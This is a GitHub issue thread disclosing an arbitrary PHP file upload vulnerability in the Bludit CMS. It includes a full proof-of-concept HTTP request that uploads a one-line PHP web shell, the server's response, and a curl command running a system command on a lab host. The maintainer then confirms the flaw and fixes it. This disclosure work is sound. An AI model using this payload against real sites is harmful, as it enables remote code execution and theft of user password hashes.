New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Arbitrary File Upload - Security #812

Closed
bousalman opened this Issue Oct 2, 2018 · 5 comments

Comments

2 participants
@bousalman
Copy link

bousalman commented Oct 2, 2018

Hi There,

I was trying the application for a while and noticed that a regular user ( Editor role ) can upload arbitrary file, in this case a PHP file. By then he can run remote PHP command on server context.

Is it OK to describe the vulnerability here ? or you prefer to send it in private ?

Thanks.

@dignajar

This comment has been minimized.

Copy link
Member

dignajar commented Oct 2, 2018

Hi,
is ok here, I'm checking and is true is possible to upload a PHP file, I going to fix it.
I don't find the way to execute it, can you show me some example?
Regards
Diego

@bousalman

This comment has been minimized.

Copy link

bousalman commented Oct 3, 2018

Hi Diego,

The uploading function for pictures is done by POSTing in "/admin/ajax/upload-files" , the Editor role User can upload pictures when he create or modify a content.

Now malicious user can modify the HTTP request to edit the photo content and name, here I am using a Burp suite proxy to do it:

POST /admin/ajax/upload-files HTTP/1.1
Host: 192.168.140.154
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.140.154/admin/new-content
X-Requested-With: XMLHttpRequest
Content-Length: 415
Content-Type: multipart/form-data; boundary=---------------------------26228568510541774541866388118
Cookie: BLUDIT-KEY=5s634f6up72tmfi050i4okunf9
Connection: close

-----------------------------26228568510541774541866388118
Content-Disposition: form-data; name="tokenCSRF"

67987ea926223b28949695d6936191d28d320f20
-----------------------------26228568510541774541866388118
Content-Disposition: form-data; name="bluditInputFiles[]"; filename="poc.php"
Content-Type: image/png

<?php system($_GET["cmd"]);?>

-----------------------------26228568510541774541866388118--

and the response is:
{"status":0,"message":"Image uploaded success.","filename":"poc.php","absoluteURL":"http://192.168.140.154/bl-content/uploads/poc.php","absoluteURLThumbnail":"http://192.168.140.154/bl-content/uploads/thumbnails/poc.php","absolutePath":"/var/www/html/bl-content/uploads/poc.php"}

Next the malicious user can request the uploaded PHP file since the path is known from the HTTP response. Here I am running a system command using the PHP page:

root@kali:~# curl http://192.168.140.154/bl-content/uploads/poc.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

By now the malicious user have a remote command execution thru the web-shell, can run any terminal command he want. for example download the user database file ( XML ) and start cracking all users passwords since the hash is stored along with the salt.

Mitigation:
I did a quick code review, You should implement a whitelist for file extension that allow only photos ones.
Moreover some frameworks do inspection/processing for the photo files before saving it in the disk, this will corrupt the payload of the malicious user.

Thanks,

@dignajar

This comment has been minimized.

Copy link
Member

dignajar commented Oct 4, 2018

Clear, I going to check the file extension, there is another way to check the EXIF data, but I need to add more requirements to the system and I don't want to add more complexity to the users.
Thanks for report it.

@bousalman

This comment has been minimized.

Copy link

bousalman commented Oct 4, 2018

You welcome, Glad I can help.

@dignajar

This comment has been minimized.

Copy link
Member

dignajar commented Oct 8, 2018

Implemented in Bludit v3.1.0. Thanks!

@dignajar dignajar closed this Oct 8, 2018

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment